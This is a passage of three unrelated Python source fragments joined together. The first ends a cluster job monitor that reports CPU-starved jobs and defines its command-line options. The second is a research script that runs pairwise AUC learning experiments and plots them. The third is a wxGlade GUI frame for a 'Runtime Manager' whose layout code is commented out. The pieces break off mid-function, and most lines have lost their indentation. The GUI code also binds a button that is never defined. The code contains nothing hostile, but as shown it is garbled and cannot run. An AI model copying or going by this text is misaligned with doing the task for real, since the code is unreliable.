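    # Illustrative (hypothetical) return value:
    #   ({"hostA": 3, "hostB": 1}, {"1234567": 2, "1234568": 1})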
dct_host_starved_jobs = {} # key: host; value: set of job IDs (not job_and_task)
dct_starved_job_hosts = {} # key: job ID, value: set of hosts on which that job has a starved task
for job_and_task, problem_state in dct_strange_state_jobs.items():
if problem_state.state.startswith("cpu-starved"):
dct_host_starved_jobs.setdefault(problem_state.host, set()).add(job_and_task.job_id)
dct_starved_job_hosts.setdefault(job_and_task.job_id, set()).add(problem_state.host)
if job_per_host_verbosity_threshold is not None:
        for host, jobs in dct_host_starved_jobs.items():
if len(jobs) >= job_per_host_verbosity_threshold:
logging.log_message(host + " has cpu-starved jobs " + ", ".join(jobs))
if host_per_job_verbosity_threshold is not None:
        for job, hosts in dct_starved_job_hosts.items():
if len(hosts) >= host_per_job_verbosity_threshold:
logging.log_message(job + " is cpu-starved on hosts " + ", ".join(hosts))
return (dict([(host, len(jobs)) for host, jobs in dct_host_starved_jobs.items()]),
dict([(job_id, len(hosts)) for job_id, hosts in dct_starved_job_hosts.items()]))
def format_job_problem(job_and_task, problem_state):
if problem_state.start_time is not None:
start_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(problem_state.start_time))
else:
start_time = "start time not captured"
return "%s\t%s\t%s.%s:\t%s" % \
(start_time, problem_state.user, job_and_task.job_id, job_and_task.task_id, problem_state.state)
def format_problems(dct_problems):
message = ""
    for host, problems in dct_problems.items():
message += "%s:\n\t%s\n" % (host, "\n\t".join(problems))
return message
def sigint_handler(signum, frame):
"""Log termination cleanly"""
logging.log_message("Exiting after received signal %d\n%s" %
(signum, "".join(traceback.format_list(traceback.extract_stack(frame)))))
sys.exit()
def main(args=None):
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--email", "-e", action="append",
help="email address(es) to which report should be sent. Default: write report to stdout")
parser.add_argument("--user", "-u", action="append",
help="User(s) whose jobs should be checked. Default: all users")
parser.add_argument("--user-file", type=read_list_file,
help="File containing list of users whose jobs should be checked, one per line.")
parser.add_argument("--exclude-user", action="append",
help="User(s) whose jobs should not be checked.")
parser.add_argument("--exclude-user-file", type=read_list_file,
help="File containing list of users whose jobs should not be checked, one per line.")
parser.add_argument("--ignore-job", "-j", action="append",
help="Job ID(s) that should be ignored")
parser.add_argument("--ignore-job-file", type=read_list_file,
help="File containing list of job ID(s) that should be ignored, one per line")
parser.add_argument("--ignore-host", action="append",
help="Host(s) that should be ignored")
parser.add_argument("--ignore-host-file", type=read_list_file,
help="File containing list of host(s) that should be ignored, one per line")
parser.add_argument("--sleep-mins", "-s", type=float, default=60,
help="Time (in minutes) to sleep between status checks. Default: %(default)s")
parser.add_argument("--heartbeat-mins", type=float, default=24 * 60,
help="Time (in minutes) to sleep between sending message even if no problems. "
"Default: %(default)s")
parser.add_argument("--delete-mins", "-d", type=float, default=30,
help="A job in deletion state for more than this time (in minutes) is treated as a problem. "
"Default: %(default)s")
parser.add_argument("--transfer-mins", "-t", type=float, default=30,
help="A job in transfer state for more than this time (in minutes) is treated as a problem. "
"Default: %(default)s")
parser.add_argument("--cpu_fraction", "-c", type=float, default=0.0001,
help="A job with cpu time/wallclock time < this value is considered cpu-starved. "
"Default: %(default)s")
parser.add_argument("--starved-jobs-per-host", type=int, default=2,
help="A cpu-starved job is not reported unless there are at least this many cpu-starved jobs"
" on the host. Multiple task for the same job are counted as one. Default: %(default)s")
parser.add_argument("--starved-task-array-hosts", type=int, default=4,
help="If a task array has cpu-starved jobs on at least this many hosts, it is assumed | |
<filename>learning-experiment/make_exps.py<gh_stars>0
"""
Code for:
Trade-offs in Large Scale Distributed Tuplewise Estimation and Learning
Author: <NAME>
"""
import os
import shutil
import json
import logging
import pickle
from scipy.io import loadmat
import numpy as np
# Avoid trouble when generating pdf's on a remote server:
# import matplotlib
# matplotlib.use("pdf")
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
import compute_stats as cs
SEED_SHUFFLE = 42
# Bounds for the axis in the plots
LB_CONV_COST = 0.01
LB_AUC = 0.005
UB_CONV_COST = 0.1
UB_AUC = 0.02
QUANTILE_PLOT_FILTER = 750
# Limit on the number of iterations represented by the plot
TYPE_TRAIN_MONITOR = "FIXED_PAIRS" # "SAME_AS_BATCH"
# FIXED_PAIRS: monitors the training loss on a fixed set of instances.
# SAME_AS_BATCH: monitors the training loss on training batches.
# Parameters of the monitoring pairs if fixed pairs.
SEED_TRAIN_MONITOR = 54
SIZE_TRAIN_MONITOR = 450000
# Others
PROP_TEST = 0.2
DEFAULT_ITE_NUMBER = 5000 # 5000
# ------------------------ Foundation functions -------------------------
def convert_data_to_pickle():
"""Loads the data from mat format and exports it to the pickle format."""
data = loadmat("shuttle.mat")
data["y"] = 2*data["y"].ravel().astype(int) - 1
pickle.dump(data, open("shuttle.pickle", "wb"))
def load_preprocess_data():
"""Loads and preprocess the data."""
data = pickle.load(open("shuttle.pickle", "rb"))
X = data["X"]
y = data["y"]
Z_tot = X[y == +1] # Minority class is the anomaly class, i.e. y = +1
X_tot = X[y == -1]
np.random.seed(SEED_SHUFFLE)
    ind_X_test = np.random.choice(X_tot.shape[0],
                                  size=int(PROP_TEST*X_tot.shape[0]),
                                  replace=False)
    ind_Z_test = np.random.choice(Z_tot.shape[0],
                                  size=int(PROP_TEST*Z_tot.shape[0]),
                                  replace=False)
    np.random.seed()
    # Convert the integer test indices into boolean masks: applying ``~`` to
    # an integer index array would not select the complement of the test rows.
    mask_X_test = np.zeros(X_tot.shape[0], dtype=bool)
    mask_X_test[ind_X_test] = True
    mask_Z_test = np.zeros(Z_tot.shape[0], dtype=bool)
    mask_Z_test[ind_Z_test] = True
    Z_train, X_train = Z_tot[~mask_Z_test], X_tot[~mask_X_test]
    Z_test, X_test = Z_tot[mask_Z_test], X_tot[mask_X_test]
train_tot = np.vstack([X_train, Z_train])
# Normalize the instances
train_mean = train_tot.mean(axis=0)
train_std = train_tot.std(axis=0)
if np.min(train_std) == 0:
raise ValueError("One of the columns in the data has constant var.")
X_train = (X_train - train_mean)/train_std
Z_train = (Z_train - train_mean)/train_std
X_test = (X_test - train_mean)/train_std
Z_test = (Z_test - train_mean)/train_std
# Add a constant
def add_constant(a):
return np.hstack([a, np.ones((a.shape[0], 1))])
X_train = add_constant(X_train)
Z_train = add_constant(Z_train)
X_test = add_constant(X_test)
Z_test = add_constant(Z_test)
return Z_train, X_train, Z_test, X_test
def learning_process(X, Z, p_learn, optim_type="momentum"):
"""Learning process for our experiments."""
n_X, n_Z = X.shape[0], Z.shape[0]
N = p_learn["N"]
B = p_learn["B"]
learning_rate = p_learn["learning_rate"]
margin = p_learn["margin"]
w = p_learn["w_init"]
to_log = ["{} : {}".format(k, v) for k, v in p_learn.items()
if not k.startswith(("train_", "test_", "w"))]
i = 0
while i < len(to_log)/4:
logging.info("%s", " / ".join(to_log[(i*4):(i*4+4)]))
i += 1
logging.info("#X: %d / #Z: %d ", n_X, n_Z)
logging.info("#X/N: %d / #Z/N: %d ", n_X/N, n_Z/N)
logging.info("pairs_per_clust: %d ", (n_X/N)*(n_Z/N))
logging.info("#eval_pairs_before_reshuffle: %d ",
B*p_learn["reshuffle_mod"])
X_s, Z_s = cs.SWR_divide(X, Z, N)
delta_w = 0
for i in range(0, p_learn["n_it"]):
if i % p_learn["reshuffle_mod"] == 0:
# logging.info("it %5d: reshuffling", i)
X_s, Z_s = cs.SWR_divide(X, Z, N)
if i % p_learn["eval_mod"] == 0:
evaluation_step(i, X_s, Z_s, w, p_learn)
gradient = (cs.UN_split(X_s, Z_s, cs.grad_inc_block(w, B, margin))
+ p_learn["reg"]*w)
assert optim_type in ["SGD", "momentum"]
if optim_type == "SGD":
delta_w = learning_rate*gradient
if optim_type == "momentum":
momentum = 0.9
delta_w = momentum*delta_w + learning_rate*gradient
w = w - delta_w
def evaluation_step(i, X_s, Z_s, w, p_learn):
"""
Modify the value of p_learn to add to the evaluation.
Monitored values, added in p_learn:
* br_AUC: block real AUC, on the training data,
* bc_AUC: block convexified AUC, on the training data,
* tr_AUC: real AUC, on the testing data,
* tc_AUC: convexified AUC, on the testing data,
"""
margin = p_learn["margin"]
logging.debug("Step %d: Begin evaluation", i)
if TYPE_TRAIN_MONITOR == "SAME_AS_BATCH":
sc_X = [x.dot(w) for x in X_s]
sc_Z = [z.dot(w) for z in Z_s]
bc_AUC = (cs.UN_split(sc_X, sc_Z, cs.conv_AUC(margin))
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
br_AUC = cs.UN_split(sc_X, sc_Z,
lambda x, z: cs.Un(x, z, kernel="AUC"))
elif TYPE_TRAIN_MONITOR == "FIXED_PAIRS":
sc_X, sc_Z = p_learn["train_X"].dot(w), p_learn["train_Z"].dot(w)
bc_AUC = (cs.conv_AUC_deter_pairs(margin)(
sc_X, sc_Z, p_learn["train_mon_pairs"])
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
br_AUC = cs.UB_pairs(
sc_X, sc_Z, p_learn["train_mon_pairs"], kernel="AUC")
sc_X_test = p_learn["test_X"].dot(w)
sc_Z_test = p_learn["test_Z"].dot(w)
tc_AUC = (cs.conv_AUC(margin)(sc_X_test, sc_Z_test)
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
tr_AUC = cs.Un(sc_X_test, sc_Z_test, kernel="AUC")
s_log = ("it %5d: bc_AUC = %.4f | br_AUC = %.4f "
+ "| tc_AUC = %5.4f | tr_AUC = %5.4f")
logging.info(s_log, i, bc_AUC, br_AUC, tc_AUC, tr_AUC)
# Elements to add to the dictionary:
elems = [("iter", i), ("norm_w", np.linalg.norm(w)),
("bc_AUC", bc_AUC), ("br_AUC", br_AUC),
("tr_AUC", tr_AUC), ("tc_AUC", tc_AUC)]
for k, v in elems:
if k in p_learn:
p_learn[k].append(v)
else:
p_learn[k] = [v]
logging.debug("Step %d: End evaluation", i)
def make_exps(reshuffle_mod, out_folder="exps/test", p_learn=None):
"""Make the experiments for the desired parameters."""
if not os.path.exists(out_folder):
os.makedirs(out_folder)
shutil.copy(os.path.basename(__file__),
"{}/executed_script.py".format(out_folder))
Z_train, X_train, Z_test, X_test = load_preprocess_data()
n_feats = Z_train.shape[1]
# Set parameters:
logging.basicConfig(filename='{}/learning_process.log'.format(out_folder),
format='%(asctime)s - %(message)s',
# - %(levelname)s
level=logging.INFO, datefmt='%m/%d/%y %I:%M:%S %p',
filemode="w")
if p_learn is None:
p_learn = {"n_it": DEFAULT_ITE_NUMBER, "margin": 1, "N": 100,
"B": 100, "reshuffle_mod": reshuffle_mod, "reg": 0.05,
"learning_rate": 0.01, "eval_mod": 25,
"w_init": np.random.normal(0, 1, (n_feats, 1)),
"test_X": X_test, "test_Z": Z_test}
if TYPE_TRAIN_MONITOR == "FIXED_PAIRS":
np.random.seed(SEED_TRAIN_MONITOR)
p_learn["train_mon_pairs"] = zip(list(
np.random.randint(0, X_train.shape[0], SIZE_TRAIN_MONITOR)), list(
np.random.randint(0, Z_train.shape[0], SIZE_TRAIN_MONITOR)))
p_learn["train_mon_pairs"] = list(p_learn["train_mon_pairs"])
p_learn["train_X"] = X_train
p_learn["train_Z"] = Z_train
np.random.seed()
print("Started optimization")
learning_process(X_train, Z_train, p_learn)
print("Finished optimization")
# We get rid of the testing numpy arrays, as well as the init.
keys_to_delete = list(filter(
lambda x: x.startswith(("train_", "test_", "w_")), p_learn.keys()))
for x in keys_to_delete:
p_learn.pop(x)
json.dump(p_learn, open("{}/dynamics.json".format(out_folder), "wt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
plot_results(p_learn, out_folder)
def plot_results(p_learn, out_folder):
"""Plots the results."""
# n_it = p_learn["n_it"]
# N = p_learn["N"]
# B = p_learn["B"]
# learning_rate = p_learn["learning_rate"]
# w_init = p_learn["w_init"]
# margin = p_learn["margin"]
reshuffle_mod = p_learn["reshuffle_mod"]
# eval_mod = p_learn["eval_mod"]
# Plot the result
plt.figure()
plt.plot(p_learn["iter"], p_learn["tc_AUC"],
label="test convAUC", color="red")
plt.plot(p_learn["iter"], p_learn["bc_AUC"],
label="train convAUC", color="red", linestyle="--")
plt.grid()
plt.legend(loc="lower left")
plt.ylabel("Convex cost", color="red")
plt.ylim([LB_CONV_COST, UB_CONV_COST])
plt.twinx()
plt.plot(p_learn["iter"], 1 - p_learn["tr_AUC"],
label="test 1-AUC", color="blue")
plt.plot(p_learn["iter"], 1 - p_learn["br_AUC"],
label="train 1-AUC", color="blue", linestyle="--")
plt.ylabel("1-AUC", color="blue")
plt.ylim([LB_AUC, UB_AUC])
plt.legend(loc="upper right")
plt.title("n_r = {}".format(reshuffle_mod))
plt.tight_layout()
plt.savefig("{}/dynamics.pdf".format(out_folder), format="pdf")
plt.close()
def load_all_results_and_plot(out_folder_list, type_plot="average"):
"""Loads the results for lots of runs and plots them."""
res_dict = dict()
for out_folder in out_folder_list:
p_learn = json.load(open("{}/dynamics.json".format(out_folder), "rt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
if k in res_dict:
res_dict[k].append(p_learn[k])
else:
res_dict[k] = [p_learn[k]]
assert type_plot in ["average", "quantile"]
out_folder_plot = "/".join(out_folder_list[0].split("/")[:-1])
if type_plot == "average":
for k in res_dict:
res_dict[k] = np.mean(res_dict[k], axis=0)
p_learn["reshuffle_mod"] = np.mean(p_learn["reshuffle_mod"])
plot_results(p_learn, out_folder_plot)
elif type_plot == "quantile":
plot_quantiles(res_dict, out_folder_plot, type_plot)
def load_results_and_plot(out_folder):
"""Loads the results and plots them."""
p_learn = json.load(open("{}/dynamics.json".format(out_folder), "rt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
plot_results(p_learn, out_folder)
def plot_quantiles(p_learn, out_folder, out_name, pos=1, saveit=True):
"""Plots the results."""
reshuffle_mod = p_learn["reshuffle_mod"]
# The entries of the dictionary contain a matrix n_runs, n_values.
alphas = [0.05]
def quantile(X, q, axis=0):
"""np.quantile only exists on numpy 1.15 and higher."""
assert axis == 0
X = np.array(X)
return np.sort(X, axis=0)[int(X.shape[0]*q), :]
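    # e.g. (made-up values) quantile([[1.], [3.], [2.]], 0.5) -> array([2.])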
filt = np.array(p_learn["iter"][0]) <= QUANTILE_PLOT_FILTER
def filt_elem(a):
return np.array(a)[filt]
# Beginning of plotting operations:
if saveit:
plt.figure(figsize=(3, 4))
for alpha in alphas:
plt.fill_between(
filt_elem(p_learn["iter"][0]),
filt_elem(quantile(p_learn["tc_AUC"], (1-alpha/2), axis=0)),
filt_elem(quantile(p_learn["tc_AUC"], alpha/2, axis=0)),
color="red", label="95% CI", alpha=0.25)
plt.plot(filt_elem(p_learn["iter"][0]),
filt_elem(np.median(p_learn["tc_AUC"], axis=0)),
label="test", color="red")
plt.plot(filt_elem(p_learn["iter"][0]),
filt_elem(np.median(p_learn["bc_AUC"], axis=0)),
label="train", color="red", linestyle="--")
plt.grid()
if not saveit:
if pos%2 == 0: # Checks whether we need a label for y axis.
# plt.gca().set_yticks([])
plt.gca().yaxis.set_major_formatter(NullFormatter())
else:
plt.ylabel("Loss", color="red")
plt.ticklabel_format(style='sci', axis="y", scilimits=(0, 0))
if pos <= 2: # Checks whether we need a label for x axis.
# plt.gca().set_xticks([])
plt.gca().xaxis.set_major_formatter(NullFormatter())
if pos > 2:
plt.xlabel("iter")
plt.ylim([LB_CONV_COST, UB_CONV_COST])
plt.twinx()
for alpha in alphas:
plt.fill_between(filt_elem(p_learn["iter"][0]),
filt_elem(quantile(1 - np.array(p_learn["tr_AUC"]),
(1-alpha/2), axis=0)),
filt_elem(quantile(1 - np.array(p_learn["tr_AUC"]),
alpha/2, axis=0)),
color="blue", label="95% CI", alpha=0.25)
plt.plot(filt_elem(p_learn["iter"][0]),
(1 - filt_elem(np.median(p_learn["tr_AUC"], axis=0))),
label="test", color="blue")
plt.plot(filt_elem(p_learn["iter"][0]),
(1 - filt_elem(np.median(p_learn["br_AUC"], axis=0))),
label="train", color="blue", linestyle="--")
if not saveit:
if pos%2 == 0: # Checks whether we need a label for y axis.
plt.ylabel("1-AUC", color="blue")
plt.ticklabel_format(style='sci', axis="y", scilimits=(0, 0))
else:
# plt.gca().set_yticks([])
plt.gca().yaxis.set_major_formatter(NullFormatter())
plt.ylim([LB_AUC, UB_AUC])
if saveit:
plt.legend(loc="upper right")
if int(np.mean(reshuffle_mod)) == 10000:
plt.title("$n_r = 10,000$")
else:
plt.title("$n_r = {}$".format(int(np.mean(reshuffle_mod))))
plt.tight_layout()
if saveit:
plt.savefig("{}/{}.pdf".format(out_folder, out_name), format="pdf")
plt.close()
def get_final_graph_legend(fig):
"""Builds the legend of figure 4 of the publication."""
plt.style.use('default')
plt.rc('text', usetex=True)
plt.rc('font', family='serif') # sans-
plt.rcParams.update({'font.size': 16,
'font.serif' : ['Computer Modern Roman']})
legend_elements = list()
# Filler if the elements are ill-disposed:
# matplotlib.patches.Rectangle((0,0), 1, 1, fill=False,
# edgecolor='none', visible=False)
legend_elements.append(plt.fill_between([0], [0], [0], | |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.6.8 on Fri Sep 2 19:08:14 2016
#
import wx
# begin wxGlade: dependencies
import gettext
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MyFrame.__init__
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.notebook_1 = wx.Notebook(self, wx.ID_ANY, style=0)
self.tab_simulation = wx.Panel(self.notebook_1, wx.ID_ANY)
self.panel_rosbag_play = wx.Panel(self.tab_simulation, wx.ID_ANY)
self.sizer_79_staticbox = wx.StaticBox(self.tab_simulation, wx.ID_ANY, "")
self.button_play_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Play"))
self.button_stop_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Stop"))
self.button_pause_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Pause"))
self.label_rosbag_play_bar = wx.StaticText(self.tab_simulation, wx.ID_ANY, _("Playing ... 82 %"))
self.label_rosbag_play_pos = wx.StaticText(self.tab_simulation, wx.ID_ANY, "")
self.static_line_3 = wx.StaticLine(self.tab_simulation, wx.ID_ANY)
self.label_rosbag_play_total = wx.StaticText(self.tab_simulation, wx.ID_ANY, "")
self.panel_5 = wx.ScrolledWindow(self.tab_simulation, wx.ID_ANY, style=wx.TAB_TRAVERSAL)
self.label_rosbag_info = wx.StaticText(self.panel_5, wx.ID_ANY, "")
self.button_rosbag_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("ROSBAG"))
self.button_rviz_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("RViz"))
self.button_rqt_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("RQT"))
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, wx.NullBitmap)
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_play_rosbag_play)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_stop_rosbag_play)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_pause_rosbag_play)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagRecord, self.button_rosbag_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_rviz_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_rqt_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_system_monitor)
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle(_("Runtime Manager"))
self.SetSize((806, 584))
self.button_stop_rosbag_play.Enable(False)
self.button_stop_rosbag_play.SetValue(1)
self.button_pause_rosbag_play.Enable(False)
self.label_rosbag_play_pos.SetMinSize((32, 17))
self.label_rosbag_play_total.SetMinSize((32, 17))
self.panel_5.SetScrollRate(10, 10)
def __do_layout(self):
pass
# # begin wxGlade: MyFrame.__do_layout
# self.sizer_1 = wx.BoxSizer(wx.VERTICAL)
# sizer_29 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_cpuinfo = wx.BoxSizer(wx.HORIZONTAL)
# sizer_85_copy = wx.BoxSizer(wx.VERTICAL)
# sizer_51_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_1_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_32 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_34 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_36_staticbox.Lower()
# sizer_36 = wx.StaticBoxSizer(self.sizer_36_staticbox, wx.HORIZONTAL)
# sizer_topics_info = wx.BoxSizer(wx.VERTICAL)
# sizer_35 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_topics_list = wx.BoxSizer(wx.VERTICAL)
# sizer_85 = wx.BoxSizer(wx.VERTICAL)
# sizer_51_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_20 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_stdout_staticbox.Lower()
# sizer_stdout = wx.StaticBoxSizer(self.sizer_stdout_staticbox, wx.VERTICAL)
# sizer_38 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_87_staticbox.Lower()
# sizer_87 = wx.StaticBoxSizer(self.sizer_87_staticbox, wx.HORIZONTAL)
# self.sizer_86_staticbox.Lower()
# sizer_86 = wx.StaticBoxSizer(self.sizer_86_staticbox, wx.HORIZONTAL)
# sizer_19 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_78 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_37 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_80 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_82 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_83 = wx.BoxSizer(wx.VERTICAL)
# sizer_81 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_79_staticbox.Lower()
# sizer_79 = wx.StaticBoxSizer(self.sizer_79_staticbox, wx.VERTICAL)
# sizer_10 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_11 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_17 = wx.BoxSizer(wx.VERTICAL)
# sizer_18 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_24 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_26_staticbox.Lower()
# sizer_26 = wx.StaticBoxSizer(self.sizer_26_staticbox, wx.VERTICAL)
# sizer_77 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_66 = wx.BoxSizer(wx.VERTICAL)
# sizer_72 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_75 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_76_copy = wx.BoxSizer(wx.VERTICAL)
# sizer_54_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_76 = wx.BoxSizer(wx.VERTICAL)
# sizer_54 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_9 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_12_staticbox.Lower()
# sizer_12 = wx.StaticBoxSizer(self.sizer_12_staticbox, wx.VERTICAL)
# self.sizer_25_staticbox.Lower()
# sizer_25 = wx.StaticBoxSizer(self.sizer_25_staticbox, wx.HORIZONTAL)
# sizer_71 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_47 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_27 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_68 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_7 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_70_staticbox.Lower()
# sizer_70 = wx.StaticBoxSizer(self.sizer_70_staticbox, wx.VERTICAL)
# self.sizer_69_staticbox.Lower()
# sizer_69 = wx.StaticBoxSizer(self.sizer_69_staticbox, wx.VERTICAL)
# sizer_33 = wx.BoxSizer(wx.VERTICAL)
# sizer_4 = wx.BoxSizer(wx.VERTICAL)
# sizer_62 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_39_staticbox.Lower()
# sizer_39 = wx.StaticBoxSizer(self.sizer_39_staticbox, wx.VERTICAL)
# sizer_53_copy_3_copy_2_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3_copy_2 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_61_staticbox.Lower()
# sizer_61 = wx.StaticBoxSizer(self.sizer_61_staticbox, wx.VERTICAL)
# sizer_53_copy_3_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_4 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_8 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_64 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_63 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_40 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_46 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_43_copy_staticbox.Lower()
# sizer_43_copy = wx.StaticBoxSizer(self.sizer_43_copy_staticbox, wx.HORIZONTAL)
# self.sizer_43_staticbox.Lower()
# sizer_43 = wx.StaticBoxSizer(self.sizer_43_staticbox, wx.HORIZONTAL)
# self.sizer_42_staticbox.Lower()
# sizer_42 = wx.StaticBoxSizer(self.sizer_42_staticbox, wx.HORIZONTAL)
# sizer_16 = wx.BoxSizer(wx.VERTICAL)
# sizer_51 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_45_staticbox.Lower()
# sizer_45 = wx.StaticBoxSizer(self.sizer_45_staticbox, wx.VERTICAL)
# sizer_59 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_2_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_2 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53.Add(self.button_map_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53.Add(self.panel_map_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53.Add(self.label_map_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53, 1, wx.EXPAND, 0)
# sizer_53_copy_1.Add(self.button_sensing_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_1.Add(self.panel_sensing_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_1.Add(self.label_sensing_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_1, 1, wx.EXPAND, 0)
# sizer_53_copy_2.Add(self.button_localization_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_2.Add(self.panel_localization_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_2.Add(self.label_localization_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_2, 1, wx.EXPAND, 0)
# sizer_53_copy_2_copy.Add(self.button_detection_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_2_copy.Add(self.panel_detection_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_2_copy.Add(self.label_detection_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_2_copy, 1, wx.EXPAND, 0)
